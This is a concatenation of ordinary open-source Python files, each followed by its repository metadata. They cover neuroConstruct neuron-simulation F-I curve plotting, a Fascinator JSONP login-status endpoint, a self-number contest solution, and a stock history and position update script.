stimOther.setDur(NumberGenerator(0))
stim.setAmp(NumberGenerator(stimAmp))
stim.setDel(NumberGenerator(stimDel))
stim.setDur(NumberGenerator(stimDur))
self.project.elecInputInfo.updateStim(stim)
self.printver("Next stim: "+ str(stim))
simRefs = self.runMultipleSims(simConfigs = [simConfig.getName()],
simulators = [simulator],
simDt = simDt,
verboseSims = verboseSims,
runInBackground = True,
simRefGlobalPrefix = simPrefix,
simRefGlobalSuffix = ("_"+str(float(stimAmp))),
varTimestepNeuron = varTimestepNeuron,
mpiConfig = mpiConfig,
suggestedRemoteRunTime = suggestedRemoteRunTime)
simRefsVsStims[simRefs[0]] = stimAmp # should be just one simRef returned...
stimAmp = stimAmp + stimAmpInc
if abs(stimAmp) < stimAmpInc/1e9: stimAmp = 0
while (len(self.allRunningSims)>0):
self.printver("Waiting for all simulations to finish...")
time.sleep(1) # wait a while...
self.updateSimsRunning()
self.printver("Going to plot traces from recorded sims: %s"%str(simRefsVsStims))
plotFrameFI = PlotManager.getPlotterFrame("F-I curve from project: "+str(self.project.getProjectFile())+" on "+simulator , 0, 1)
plotFrameVolts = PlotManager.getPlotterFrame("Voltage traces from project: "+str(self.project.getProjectFile())+" on "+simulator , 0, plotAllTraces)
plotFrameFI.setViewMode(PlotCanvas.INCLUDE_ORIGIN_VIEW)
info = "F-I curve for Simulation Configuration: "+str(simConfig)
dataSet = DataSet(info, info, "nA", "Hz", "Current injected", "Firing frequency")
dataSet.setGraphFormat(PlotCanvas.USE_CIRCLES_FOR_PLOT)
simList = simRefsVsStims.keys()
simList.sort()
for sim in simList:
simDir = File(self.project.getProjectMainDirectory(), "/simulations/"+sim)
self.printver("--- Reloading data from simulation in directory: %s"%simDir.getCanonicalPath())
try:
simData = SimulationData(simDir)
simData.initialise()
self.printver("Data loaded: ")
self.printver(simData.getAllLoadedDataStores())
times = simData.getAllTimes()
cellSegmentRef = simConfig.getCellGroups().get(0)+"_0"
volts = simData.getVoltageAtAllTimes(cellSegmentRef)
traceInfo = "Voltage at: %s in simulation: %s"%(cellSegmentRef, sim)
dataSetV = DataSet(traceInfo, traceInfo, "mV", "ms", "Membrane potential", "Time")
for i in range(len(times)):
dataSetV.addPoint(times[i], volts[i])
if plotAllTraces:
plotFrameVolts.addDataSet(dataSetV)
spikeTimes = SpikeAnalyser.getSpikeTimes(volts, times, analyseThreshold, analyseStartTime, analyseStopTime)
stimAmp = simRefsVsStims[sim]
self.printver("Number of spikes at %f nA in sim %s: %i"%(stimAmp, sim, len(spikeTimes)))
avgFreq = 0
if len(spikeTimes)>1:
avgFreq = len(spikeTimes)/ ((analyseStopTime - analyseStartTime)/1000.0)
dataSet.addPoint(stimAmp,avgFreq)
else:
dataSet.addPoint(stimAmp,0)
except:
self.printver("Error analysing simulation data from: %s"%simDir.getCanonicalPath())
self.printver(sys.exc_info()[0])
plotFrameFI.addDataSet(dataSet)
def generateBatchCurve(self,
simulator,
simConfigName,
stimAmpLow,
stimAmpInc,
stimAmpHigh,
stimDel,
stimDur,
simDuration,
analyseStartTime,
analyseStopTime,
analyseThreshold,
simDt = None,
simPrefix = 'FI_',
neuroConstructSeed = 1234,
plotAllTraces = False,
verboseSims = True,
varTimestepNeuron = None,
mpiConfig = MpiSettings.LOCAL_SERIAL,
suggestedRemoteRunTime = -1,
curveType = 'F-I'):
simConfig = self.project.simConfigInfo.getSimConfig(simConfigName)
self.printver("Going to generate %s curve on %s for sim config: %s with amplitude of stim: (%f -> %f ; %f)" % (curveType, simulator, simConfigName, stimAmpLow, stimAmpHigh, stimAmpInc))
# can generate differetn categories of simulationType F-I also SS-I
if simConfig == None:
raise NameError('No such Simulation configuration as: '+ simConfigName+'. \nExisting sim configs: '+str(self.project.simConfigInfo.getAllSimConfigNames()))
simConfig.setSimDuration(simDuration)
self.projectManager.doGenerate(simConfig.getName(), neuroConstructSeed)
while self.projectManager.isGenerating():
self.printver("Waiting for the project to be generated with Simulation Configuration: "+str(simConfig))
time.sleep(1)
numGenerated = self.project.generatedCellPositions.getNumberInAllCellGroups()
self.printver("Number of cells generated: " + str(numGenerated))
if numGenerated > 0:
self.printver("Generating scripts for simulator: %s..."%simulator)
if simulator == 'NEURON':
self.project.neuronFileManager.setQuitAfterRun(1) # Remove this line to leave the NEURON sim windows open after finishing
self.project.neuronSettings.setCopySimFiles(1) # 1 copies hoc/mod files to PySim_0 etc. and will allow multiple sims to run at once
self.project.neuronSettings.setGraphicsMode(0) # 0 hides graphs during execution
if simulator.count('GENESIS')>0 or simulator.count('MOOSE')>0:
self.project.genesisFileManager.setQuitAfterRun(1) # Remove this line to leave the NEURON sim windows open after finishing
self.project.genesisSettings.setCopySimFiles(1) # 1 copies hoc/mod files to PySim_0 etc. and will allow multiple sims to run at once
self.project.genesisSettings.setGraphicsMode(0) # 0 hides graphs during execution
stimAmp = stimAmpLow
simRefsVsStims = {}
while (stimAmp - stimAmpHigh) < (stimAmpInc/1e9): # to avoid floating point errors
######## Adjusting the amplitude of the current clamp ###############
stim = self.project.elecInputInfo.getStim(simConfig.getInputs().get(0))
if stim.getElectricalInput().getType() != "IClamp":
raise Exception('Simulation config: '+ simConfigName+' has a non IClamp input: '+str(stim)+'!')
if simConfig.getInputs()>1:
for stimIndex in range(1, simConfig.getInputs().size()):
stimOther = self.project.elecInputInfo.getStim(simConfig.getInputs().get(stimIndex))
if stimOther.getElectricalInput().getType() != "IClamp":
raise Exception('Simulation config: '+ simConfigName+' has a non IClamp input: '+str(stimOther)+'!')
else:
stimOther.setAmp(NumberGenerator(0))
stimOther.setDel(NumberGenerator(0))
stimOther.setDur(NumberGenerator(0))
stim.setAmp(NumberGenerator(stimAmp))
stim.setDel(NumberGenerator(stimDel))
stim.setDur(NumberGenerator(stimDur))
self.project.elecInputInfo.updateStim(stim)
self.printver("Next stim: "+ str(stim))
simRefs = self.runMultipleSims(simConfigs = [simConfig.getName()],
simulators = [simulator],
simDt = simDt,
verboseSims = verboseSims,
runInBackground = True,
simRefGlobalPrefix = simPrefix,
simRefGlobalSuffix = ("_"+str(float(stimAmp))),
varTimestepNeuron = varTimestepNeuron,
mpiConfig = mpiConfig,
suggestedRemoteRunTime = suggestedRemoteRunTime)
simRefsVsStims[simRefs[0]] = stimAmp # should be just one simRef returned...
stimAmp = stimAmp + stimAmpInc
if abs(stimAmp) < stimAmpInc/1e9: stimAmp = 0
while (len(self.allRunningSims)>0):
self.printver("Waiting for all simulations to finish...")
time.sleep(1) # wait a while...
self.updateSimsRunning()
self.generatePlotAnalisys(simulator,simConfigName,analyseStartTime,analyseStopTime,analyseThreshold,plotAllTraces,curveType,simRefsVsStims)
def generatePlotAnalisys(self,
simulator,
simConfigName,
analyseStartTime,
analyseStopTime,
analyseThreshold,
plotAllTraces,
curveType,
simRefsVsStims):
simConfig = self.project.simConfigInfo.getSimConfig(simConfigName)
self.printver("Going to plot traces from recorded sims: %s"%str(simRefsVsStims))
self.plotFrames[curveType] = PlotManager.getPlotterFrame(curveType+" curve from project: "+str(self.project.getProjectFile())+" on "+simulator , 0, 1)
self.plotFrames["Volts"] = PlotManager.getPlotterFrame("Voltage traces from project: "+str(self.project.getProjectFile())+" on "+simulator , 0, plotAllTraces)
self.plotFrames[curveType].setViewMode(PlotCanvas.INCLUDE_ORIGIN_VIEW)
info = curveType+" curve for Simulation Configuration: "+str(simConfig)
if (curveType == "F-I") :
self.dataSets[curveType] = DataSet(info, info, "nA", "Hz", "Current injected", "Firing frequency")
elif (curveType == "SS-I") :
self.dataSets[curveType] = DataSet(info, info, "nA", "V", "Current injected", "Steady state Voltage")
self.dataSets[curveType].setGraphFormat(PlotCanvas.USE_CIRCLES_FOR_PLOT)
simList = simRefsVsStims.keys()
simList.sort()
for sim in simList:
simDir = File(self.project.getProjectMainDirectory(), "/simulations/"+sim)
self.printver("--- Reloading data from simulation in directory: %s"%simDir.getCanonicalPath())
try:
simData = SimulationData(simDir)
simData.initialise()
self.printver("Data loaded: ")
self.printver(simData.getAllLoadedDataStores())
times = simData.getAllTimes()
cellSegmentRef = simConfig.getCellGroups().get(0)+"_0"
volts = simData.getVoltageAtAllTimes(cellSegmentRef)
traceInfo = "Voltage at: %s in simulation: %s"%(cellSegmentRef, sim)
self.dataSets["V"] = DataSet(traceInfo, traceInfo, "mV", "ms", "Membrane potential", "Time")
for i in range(len(times)):
self.dataSets["V"].addPoint(times[i], volts[i])
if plotAllTraces:
self.plotFrames["V"].addDataSet(self.dataSets["V"])
if (curveType == "F-I") :
spikeTimes = SpikeAnalyser.getSpikeTimes(volts, times, analyseThreshold, analyseStartTime, analyseStopTime)
stimAmp = simRefsVsStims[sim]
self.printver("Number of spikes at %f nA in sim %s: %i"%(stimAmp, sim, len(spikeTimes)))
avgFreq = 0
if len(spikeTimes)>1:
avgFreq = len(spikeTimes)/ ((analyseStopTime - analyseStartTime)/1000.0)
self.dataSets["F-I"].addPoint(stimAmp,avgFreq)
else:
self.dataSets["F-I"].addPoint(stimAmp,0)
elif (curveType == "SS-I") :
# check within analyseStartTime and analyseStopTime if we deviate by more than +/- analyseThreshold
steadyStateVoltageFound = False
stimAmp = simRefsVsStims[sim]
minVolt = 99999999
maxVolt = -99999999
for i in range(len(volts)) :
if times[i] >= analyseStartTime and times[i] <= analyseStopTime :
if steadyStateVoltageFound == False:
self.printver("Data start time found for SS-I")
minVolt = volts[i]
maxVolt = volts[i]
self.printver(" i:", i, " times_i:",times[i]," minVolt:",minVolt," maxVolt:",maxVolt," delta:",maxVolt - minVolt," threshold:",analyseThreshold)
steadyStateVoltageFound = True
if volts[i] < minVolt :
minVolt = volts[i]
elif volts[i] > maxVolt :
maxVolt = volts[i]
if (maxVolt - minVolt) > analyseThreshold :
self.printver("Data outside the threshold for steady state voltage, Error")
self.printver(" i:", i, " times_i:",times[i]," minVolt:",minVolt," maxVolt:",maxVolt," delta:",maxVolt - minVolt," threshold:",analyseThreshold)
steadyStateVoltageFound = False
break
if (steadyStateVoltageFound) :
midVoltage = (minVolt + maxVolt) / 2
self.dataSets["SS-I"].addPoint(stimAmp,midVoltage)
except:
self.printver("Error analysing simulation data from: %s"%simDir.getCanonicalPath())
self.printver(sys.exc_info()[0])
self.plotFrames[curveType].addDataSet(self.dataSets[curveType])
|
rgerkin/neuroConstruct
|
pythonNeuroML/nCUtils/ncutils.py
|
Python
|
gpl-2.0
| 66,510
|
from com.googlecode.fascinator.common import JsonSimple
class AuthtestData:
def __init__(self):
pass
def __activate__(self, context):
request = context["request"]
response = context["response"]
writer = response.getPrintWriter("text/javascript; charset=UTF-8")
result = JsonSimple()
## Look for the JSONP callback to use
jsonpCallback = request.getParameter("callback")
if jsonpCallback is None:
jsonpCallback = request.getParameter("jsonp_callback")
if jsonpCallback is None:
response.setStatus(403)
writer.println("Error: This interface only responds to JSONP")
writer.close()
return
if context["page"].authentication.is_logged_in():
result.getJsonObject().put("isAuthenticated", "true")
else:
result.getJsonObject().put("isAuthenticated", "false")
writer.println(jsonpCallback + "(" + result.toString() + ")")
writer.close()
|
the-fascinator/fascinator-portal
|
src/main/config/portal/default/default/scripts/actions/authtest.py
|
Python
|
gpl-2.0
| 1,050
|
import sys
devlali = {}
def sum_number(number):
str_n = str(number)
total = 0
for n in str_n:
total += int(n)
return total + number
def generate_devlali():
for i in range(10001):
total = sum_number(i)
if (total in devlali.keys()):
tmp_list = devlali[total]
tmp_list.append(i)
devlali[total] = tmp_list
else:
devlali[total] = [i]
def get_devlali(number):
if (number in devlali.keys()):
if (len(devlali[number]) > 1):
return 'junction'
else:
return 'generated'
else:
return 'self'
def main():
generate_devlali()
lines = int(sys.stdin.readline().strip())
for num in range(lines):
n = int(sys.stdin.readline().strip())
print n, get_devlali(n)
main()
|
i2c2-caj/ACM
|
solutions/devlali/devlali.py
|
Python
|
gpl-2.0
| 842
|
# -*- coding:utf-8 -*-
# !/usr/bin/env python
#import easytrader
import easyhistory
import pdSql_common as pds
from pdSql import StockSQL
import sys
import datetime
from pytrade_api import *
from multiprocessing import Pool
import os, time
import file_config as fc
import code
stock_sql_obj=StockSQL(sqlite_file='pytrader.db',sqltype='sqlite',is_today_update=True)
CHINESE_DICT = stock_sql_obj.get_code_to_name()
def seprate_list(all_codes,seprate_num=4):
"""
分割股票池
"""
#all_codes = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]
c = len(all_codes)
sub_c = int(c/seprate_num)
code_list_dict = {}
for j in range(seprate_num-1):
code_list_dict[j] = all_codes[j*sub_c:(j+1)*sub_c]
code_list_dict[j+1] = all_codes[(j+1)*sub_c:]
return code_list_dict
def update_yh_hist_data(all_codes,process_id,latest_date_str):
"""
更新历史数据,单个CPU
"""
all_count = len(all_codes)
print('processor %s: all_count=%s '% (process_id,all_count))
if all_count<=0:
print('processor %s: empty list'% process_id)
return
else:
print('processor %s start'%process_id)
latest_count = 0
count = 0
pc0=0
#print('all_codes=',all_codes)
for code in all_codes:
#print('code=',code)
df,has_tdx_last_string = pds.get_yh_raw_hist_df(code,latest_count=None)
pc = round(round(count,2)/all_count,2)*100
if pc>pc0:
#print('count=',count)
print('processor %s 完成数据更新百分之%s' % (process_id,pc))
pc0 = pc
if len(df)>=1:
last_code_trade_date = df.tail(1).iloc[0].date
if last_code_trade_date==latest_date_str:
latest_count = latest_count + 1
#time.sleep(0.2)
count = count + 1
latest_update_rate =round(round(latest_count,2)/all_count,2)
print('latest_update_rate_processor_%s=%s'%(process_id,latest_update_rate))
return
def update_one_stock_k_data(code):
df,has_tdx_last_string = pds.get_yh_raw_hist_df(code,latest_count=None)
return
def multiprocess_update_k_data0(code_list_dict,update_type='yh'):
"""
多进程更新历史数据,apply_async方法
存在问题:数据分片丢失
"""
#code_list_dict = seprate_list(all_codes,4)
#print('code_list_dict=',code_list_dict)
print('Parent process %s.' % os.getpid())
processor_num=len(code_list_dict)
#update_yh_hist_data(codes_list=[],process_id=0)
p = Pool()
for i in range(processor_num):
p.apply_async(update_yh_hist_data, args=(code_list_dict[i],i,last_date_str,))
print('Waiting for all subprocesses done...')
p.close()
p.join()
print('All subprocesses done.')
return
def multiprocess_update_k_data(allcodes,update_type='yh',pool_num=10):
"""
多进程更新历史数据,map方法
"""
#code_list_dict = seprate_list(all_codes,4)
#print('code_list_dict=',code_list_dict)
print('Parent process %s, multiprocess_num=%s.' % (os.getpid(),pool_num))
processor_num=len(allcodes)
#update_yh_hist_data(codes_list=[],process_id=0)
p = Pool(pool_num)
p.map(update_one_stock_k_data,allcodes)
print('Waiting for all subprocesses done...')
p.close()
p.join()
print('All subprocesses done.')
return
def update_k_data(update_type='yh'):
stock_sql = StockSQL()
hold_df,hold_stocks,available_sells = stock_sql.get_hold_stocks(accounts = ['36005', '38736'])
print('hold_stocks=',hold_stocks)
print('available_sells=',available_sells)
#pds.get_exit_price(hold_codes=['002521'],data_path='C:/中国银河证券海王星/T0002/export/' )
#print(hold_df)
"""从新浪 qq网页更新股票"""
#easyhistory.init(path="C:/hist",stock_codes=hold_stocks)
#easyhistory.update(path="C:/hist",stock_codes=hold_stocks)
"""从银河更新股票"""
#for stock in hold_stocks:
#pds.update_one_stock(symbol=stock,realtime_update=False,dest_dir='C:/hist/day/data/', force_update_from_YH=False)
# pass
#stock_sql.update_sql_position(users={'account':'36005','broker':'yh','json':'yh.json'})
#stock_sql.update_sql_position(users={'account':'38736','broker':'yh','json':'yh1.json'})
#hold_df,hold_stocks,available_sells = stock_sql.get_hold_stocks(accounts = ['36005', '38736'])
#print('hold_stocks=',hold_stocks)
#print(hold_df)
#pds.update_one_stock(symbol='sh',force_update=False)
#pds.update_codes_from_YH(realtime_update=False)
"""从银河更新指数"""
#pds.update_codes_from_YH(realtime_update=False,dest_dir='C:/hist/day/data/', force_update_from_YH=True)
#pds.update_codes_from_YH(realtime_update=False,dest_dir='C:/hist/day/data/', force_update_from_YH=True)
#indexs = ['zxb', 'sh50', 'hs300', 'sz300', 'cyb', 'sz', 'zx300', 'sh']
"""
potential_df = stock_sql.query_data(table='potential',fields='category_id,code,valid,name',condition='valid>=1')
print(potential_df)
lanchou_df = potential_df[potential_df['category_id']==1]
print(lanchou_df['code'].values.tolist())
"""
#"""
last_date_str = pds.tt.get_last_trade_date(date_format='%Y/%m/%d')
latest_date_str = pds.tt.get_latest_trade_date(date_format='%Y/%m/%d')
next_date_str = pds.tt.get_next_trade_date(date_format='%Y/%m/%d')
print('last_date = ',last_date_str)
print('latest_date_str=',latest_date_str)
print('next_date_str=',next_date_str)
indexs,funds,b_stock,all_stocks = pds.get_different_symbols()
if update_type == 'index':
#从银河更新指数
#stock_sql.update_sql_index(index_list=['sh','sz','zxb','cyb','hs300','sh50'],force_update=False)
#stock_sql.download_hist_as_csv(indexs = ['sh','sz','zxb','cyb','hs300','sh50'],dir='C:/hist/day/data/')
pds.update_codes_from_YH(indexs,realtime_update=False,dest_dir='C:/hist/day/data/', force_update_from_YH=True)
elif update_type == 'fund':
#从银河更新基金
all_codes = pds.get_all_code(hist_dir='C:/中国银河证券海王星/T0002/export/')
funds =[]
for code in all_codes:
if code.startswith('1') or code.startswith('5'):
funds.append(code)
pds.update_codes_from_YH(funds,realtime_update=False,dest_dir='C:/hist/day/data/', force_update_from_YH=True)
elif update_type == 'position':
#更新仓位
#stock_sql.update_sql_position(users={'36005':{'broker':'yh','json':'yh.json'},'38736':{'broker':'yh','json':'yh1.json'}})
stock_sql.update_sql_position(users={'account':'36005','broker':'yh','json':'yh.json'})
stock_sql.update_sql_position(users={'account':'38736','broker':'yh','json':'yh1.json'})
hold_df,hold_stocks,available_sells = stock_sql.get_hold_stocks(accounts = ['36005', '38736'])
print('hold_stocks=',hold_stocks)
print(hold_df)
elif update_type == 'stock':
#从新浪 qq网页更新股票
#easyhistory.init(path="C:/hist",stock_codes=hold_stocks)
#easyhistory.update(path="C:/hist",stock_codes=hold_stocks)
#easyhistory.init(path="C:/hist")#,stock_codes=all_codes)
easyhistory.update(path="C:/hist",stock_codes=all_stocks)#+b_stock)
elif update_type == 'YH' or update_type == 'yh':
all_codes = pds.get_all_code(hist_dir='C:/中国银河证券海王星/T0002/export/')
#all_codes = ['999999', '000016', '399007', '399008', '399006', '000300', '399005', '399001',
# '399004','399106','000009','000010','000903','000905']
#all_codes=['300162']
"""
code_list_dict = seprate_list(all_codes,4)
print('code_list_dict=',code_list_dict)
print('Parent process %s.' % os.getpid())
#update_yh_hist_data(codes_list=[],process_id=0)
p = Pool()
for i in range(4):
p.apply_async(update_yh_hist_data, args=(code_list_dict[i],i))
print('Waiting for all subprocesses done...')
p.close()
p.join()
print('All subprocesses done.')
"""
all_count = len(all_codes)
latest_count = 0
count = 0
pc0=0
for code in all_codes:
df,has_tdx_last_string = pds.get_yh_raw_hist_df(code,latest_count=None)
count = count + 1
pc = round(round(count,2)/all_count,2)* 100
if pc>pc0:
print('count=',count)
print('完成数据更新百分之%s' % pc)
pc0 = pc
if len(df)>=1:
last_code_trade_date = df.tail(1).iloc[0].date
if last_code_trade_date==latest_date_str:
latest_count = latest_count + 1
latest_update_rate =round(round(latest_count,2)/all_count,2)
print('latest_update_rate=',latest_update_rate)
#"""
else:
pass
def get_stock_last_trade_date_yh():
last_date_str=''
is_need_del_tdx_last_string=False
df,has_tdx_last_string = pds.get_yh_raw_hist_df(test_code,latest_count=None)
if has_tdx_last_string:
is_need_del_tdx_last_string =True
if not df.empty:
last_date_str_stock = df.tail(1).iloc[0].date
if last_date_str_stock>=target_last_date_str:
last_date_str = last_date_str_stock
else:
if last_date_str_stock>last_date_str:
last_date_str = last_date_str_stock
else:
pass
else:
pass
return last_date_str,is_need_del_tdx_last_string
def get_last_trade_date_yh_hist(target_last_date_str,default_codes=['601398','000002','002001','300059','601857','600028','000333','300251','601766','002027']):
last_date_str=''
is_need_del_tdx_last_string = False
for test_code in default_codes:
df,has_tdx_last_string = pds.get_yh_raw_hist_df(test_code,latest_count=None)
if has_tdx_last_string:
is_need_del_tdx_last_string =True
if not df.empty:
last_date_str_stock = df.tail(1).iloc[0].date
if last_date_str_stock>=target_last_date_str:
last_date_str = last_date_str_stock
break
else:
if last_date_str_stock>last_date_str:
last_date_str = last_date_str_stock
else:
pass
return last_date_str,is_need_del_tdx_last_string
def update_hist_k_datas(update_type='yh'):
target_last_date_str = pds.tt.get_last_trade_date(date_format='%Y/%m/%d')
last_date_str,is_need_del_tdx_last_string = get_last_trade_date_yh_hist(target_last_date_str)
is_need_update = pds.tt.is_need_update_histdata(last_date_str)
update_state = 0
if is_need_update or is_need_del_tdx_last_string:
start = time.time()
all_codes = pds.get_all_code(hist_dir='C:/中国银河证券海王星/T0002/export/')
#multiprocess_update_k_data(code_list_dict) #apply,非阻塞,传不同参数,支持回调函数
multiprocess_update_k_data(all_codes,update_type) #map,阻塞,一个参数
end = time.time()
print('Task update yh hist data runs %0.2f seconds.' % (end - start))
"""Post-check"""
last_date_str,is_need_del_tdx_last_string = get_last_trade_date_yh_hist(target_last_date_str)
is_need_update = pds.tt.is_need_update_histdata(last_date_str)
if is_need_update and not is_need_del_tdx_last_string:
print('尝试更新历史数据,但是更新失败;请全部盘后数据已下载...')
update_state = -1
else:
update_state = 1
else:
print('No need to update history data')
return update_state
def append_to_csv(value,column_name='code',file_name='C:/work/temp/stop_stocks.csv',empty_first=False):
"""
追加单列的CSV文件
"""
stop_codes = []
if empty_first:
pd.DataFrame({column_name:[]}).to_csv(file_name,encoding='utf-8')
try:
stop_trade_df = df=pd.read_csv(file_name)
stop_codes = stop_trade_df[column_name].values.tolist()
except:
pd.DataFrame({column_name:[]}).to_csv(file_name,encoding='utf-8')
stop_codes.append(value)
new_df = pd.DataFrame({column_name:stop_codes})
new_df.to_csv(file_name,encoding='utf-8')
return new_df
def combine_file(tail_num=1,dest_dir='C:/work/temp/',keyword='',prefile_slip_num=0,columns=None,file_list=[],chinese_dict={}):
"""
合并指定目录的最后几行
"""
all_files = os.listdir(dest_dir)
df = pd.DataFrame({})
if not all_files:
return df
file_names = []
if not keyword:
file_names = all_files
else:#根据keywo过滤文件
for file in all_files:
if keyword in file:
file_names.append(file)
else:
continue
#file_names=['bs_000001.csv', 'bs_000002.csv']
#file_names=['000001.csv', '000002.csv']
if file_list:
file_names = list(set(file_names).intersection(set(file_list)))
for file_name in file_names:
tail_df = pd.read_csv(dest_dir+file_name,usecols=None).tail(tail_num)
#columns = tail_df.columns.values.tolist()
#print('columns',columns)
prefile_name = file_name.split('.')[0]
if prefile_slip_num:
prefile_name = prefile_name[prefile_slip_num:]
tail_df['code'] = prefile_name
#tail_df['name'] = tail_df['code'].apply(lambda x: pds.format_name_by_code(x,CHINESE_DICT))
"""
if CHINESE_DICT:#添加中文代码
try:
tail_df['name'] = CHINESE_DICT[prefile_name]
except:
tail_df['name'] = '某指数'
"""
df=df.append(tail_df)
return df
#df = combine_file(tail_num=1,dest_dir='d:/work/temp2/')
def get_latest_yh_k_stocks(write_file_name=fc.ALL_YH_KDATA_FILE,data_dir=fc.YH_SOURCE_DATA_DIR):
"""
获取所有银河最后一个K线的数据:特定目录下
"""
columns = ['date', 'open', 'high', 'low', 'close', 'volume', 'amount']
columns = pds.get_data_columns(dest_dir=data_dir)
df = combine_file(tail_num=1,dest_dir=data_dir,keyword='',prefile_slip_num=0,columns=columns)
if df.empty:
return df
df['counts']=df.index
df = df[['date', 'open', 'high', 'low', 'close', 'volume', 'amount']+['counts','code']]
df['code'] = df['code'].apply(lambda x: pds.format_code(x))
df['name'] = df['code'].apply(lambda x: pds.format_name_by_code(x,CHINESE_DICT))
df = df.set_index('code')
"""
if CHINESE_DICT:#添加中文代码
try:
tail_df['name'] = CHINESE_DICT[prefile_name]
except:
tail_df['name'] = '某指数'
"""
if write_file_name:
try:
df.to_csv(write_file_name,encoding='utf-8')
except Exception as e:
print('get_latest_yh_k_stocks: ',e)
return df
#get_latest_yh_k_stocks()
def get_latest_yh_k_stocks_from_csv(file_name=fc.ALL_YH_KDATA_FILE):
"""
获取股票K线数据,数据来源银河证券
"""
#file_name = 'C:/work/result/all_yh_stocks.csv'
#columns = ['date', 'open', 'high', 'low', 'close', 'volume', 'amount']+['counts','code']
columns = pds.get_data_columns(dest_dir=fc.YH_SOURCE_DATA_DIR) + ['counts','code']
#try:
if True:
df = pd.read_csv(file_name)#,usecols=columns)
#print(df)
#print(type(df['code']))
df['code'] = df['name'].apply(lambda x:pds.format_code(x))
df['name'] = df['code'].apply(lambda x: pds.format_name_by_code(x,CHINESE_DICT))
df = df.set_index('code')
return df
#except:
# return get_latest_yh_k_stocks(write_file_name=file_name)
#print(get_latest_yh_k_stocks_from_csv())
def get_stop_stock(last_date_str,source='from_yh'):
"""
获取停牌股票,数据来源银河证券
"""
df = get_latest_yh_k_stocks_from_csv(write_file_name=fc.ALL_YH_KDATA_FILE)
if df.empty:
return pd.DataFrame({})
stop_df = df[df.date<last_date_str]
return stop_df
def update_history_postion():
#freeze_support()
#update_type = ''
update_type = 'index'
#update_type = 'position'
#update_type = 'stock'
update_type = 'yh'
#update_type = 'aa'
now_time =datetime.datetime.now()
now_time_str = now_time.strftime('%Y/%m/%d %X')
last_date_str = pds.tt.get_last_trade_date(date_format='%Y/%m/%d')
print('now_time = ',now_time_str)
print('last_trade_date = ',last_date_str)
if len(sys.argv)>=2:
if sys.argv[1] and isinstance(sys.argv[1], str):
update_type = sys.argv[1] #start date string
"""
#update_type = 'index'
#update_type = 'position'
#update_type = 'aa'
#update_k_data(update_type)
all_codes = pds.get_all_code(hist_dir='C:/中国银河证券海王星/T0002/export/')
#all_codes = ['999999', '000016', '399007', '399008', '399006', '000300', '399005', '399001',
# '399004','399106','000009','000010','000903','000905']
#all_codes=['300162']
code_list_dict = seprate_list(all_codes,4)
#print('code_list_dict=',code_list_dict)
#multiprocess_update_k_data(code_list_dict) #apply,非阻塞,传不同参数,支持回调函数
multiprocess_update_k_data(all_codes,update_type='yh') #map,阻塞,一个参数
"""
stock_sql = StockSQL()
pre_is_tdx_uptodate,pre_is_pos_uptodate,pre_is_backtest_uptodate,systime_dict = stock_sql.is_histdata_uptodate()
print(pre_is_tdx_uptodate,pre_is_pos_uptodate,pre_is_backtest_uptodate,systime_dict)
#pre_is_tdx_uptodate,pre_is_pos_uptodate=True,False
pre_is_tdx_uptodate = False
if not pre_is_tdx_uptodate:#更新历史数据
update_state = update_hist_k_datas(update_type)
if update_state:
"""写入数据库:标识已经更新通达信历史数据 """
#stock_sql.write_tdx_histdata_update_time(now_time_str)
stock_sql.update_system_time(update_field='tdx_update_time')
"""更新all-in-one历史数据文件"""
get_latest_yh_k_stocks(fc.ALL_YH_KDATA_FILE)
else:
print('历史数据已经更新,无需更新;上一次更新时间:%s' % systime_dict['tdx_update_time'])
#stock_sql.update_data(table='systime',fields='tdx_update_time',values=now_time_str,condition='id=0')
#stock_sql.update_data(table='systime',fields='tdx_update_time',values=now_time_str,condition='id=0')
if not pre_is_pos_uptodate:
"""更新持仓数据"""
trader_api='shuangzixing'
op_tdx = trader(trade_api='shuangzixing',acc='331600036005',bebug=False)
if not op_tdx:
print('Error')
"""
op_tdx =trader(trade_api,bebug=True)
op_tdx.enable_debug(debug=True)
"""
#pre_position = op_tdx.getPositionDict()
position = op_tdx.get_all_position()
#position,avl_sell_datas,monitor_stocks = op_tdx.get_all_positions()
print('position=',position)
pos_df = pds.position_datafrom_from_dict(position)
if not pos_df.empty:
"""写入数据库:标识已经更新持仓数据 """
stock_sql.update_all_position(pos_df,table_name='allpositions')
#stock_sql.write_position_update_time(now_time_str)
stock_sql.update_system_time(update_field='pos_update_time')
"""持仓数据写入CSV文件"""
try:
pos_df.to_csv(fc.POSITION_FILE,encoding='gb2312')#encoding='utf-8')
except:
pass
df_dict = stock_sql.get_systime()
print(df_dict)
else:
print('持仓数据已经更新,无需更新;上一次更新时间:%s' % systime_dict['pos_update_time'])
is_tdx_uptodate,is_pos_uptodate,is_backtest_uptodate,systime_dict = stock_sql.is_histdata_uptodate()
if pre_is_tdx_uptodate!=is_tdx_uptodate:
print('完成历史数据更新!')
if pre_is_pos_uptodate!=is_pos_uptodate:
print('完成持仓数据更新!')
#print( 'is_tdx_uptodate=%s, is_pos_uptodate=%s'% (is_tdx_uptodate,is_pos_uptodate))
"""
print('Parent process %s.' % os.getpid())
#update_yh_hist_data(codes_list=[],process_id=0)
p = Pool()
for i in range(4):
p.apply_async(update_yh_hist_data, args=(code_list_dict[i],i,last_date_str,))
print('Waiting for all subprocesses done...')
p.close()
p.join()
print('All subprocesses done.')
update_data = stock_sql.get_table_update_time()
print('last_position_update_time=',update_data['hold'])
print('last_index_update_time=',update_data['sh'])
print(stock_sql.hold)
"""
#"""
"""
print(update_data)
broker = 'yh'
need_data = 'yh.json'
user = easytrader.use('yh')
user.prepare('yh.json')
holding_stocks_df = user.position#['证券代码'] #['code']
print(holding_stocks_df)
"""
"""
当前持仓 股份可用 参考市值 参考市价 股份余额 参考盈亏 交易市场 参考成本价 盈亏比例(%) 股东代码 \
0 6300 6300 24885.0 3.95 6300 343.00 深A 3.896 1.39% 0130010635
1 400 400 9900.0 24.75 400 163.00 深A 24.343 1.67% 0130010635
2 600 600 15060.0 25.10 600 115.00 深A 24.908 0.77% 0130010635
3 1260 0 13041.0 10.35 1260 906.06 沪A 9.631 7.47% A732980330
证券代码 证券名称 买入冻结 卖出冻结
0 000932 华菱钢铁 0 0
1 000977 浪潮信息 0 0
2 300326 凯利泰 0 0
3 601009 南京银行 0 0
"""
#stock_sql.drop_table(table_name='myholding')
#stock_sql.insert_table(data_frame=holding_stocks_df,table_name='myholding')
|
allisnone/pytrade
|
position_history_update.py
|
Python
|
gpl-2.0
| 22,677
|
# -*- coding: UTF-8 -*-
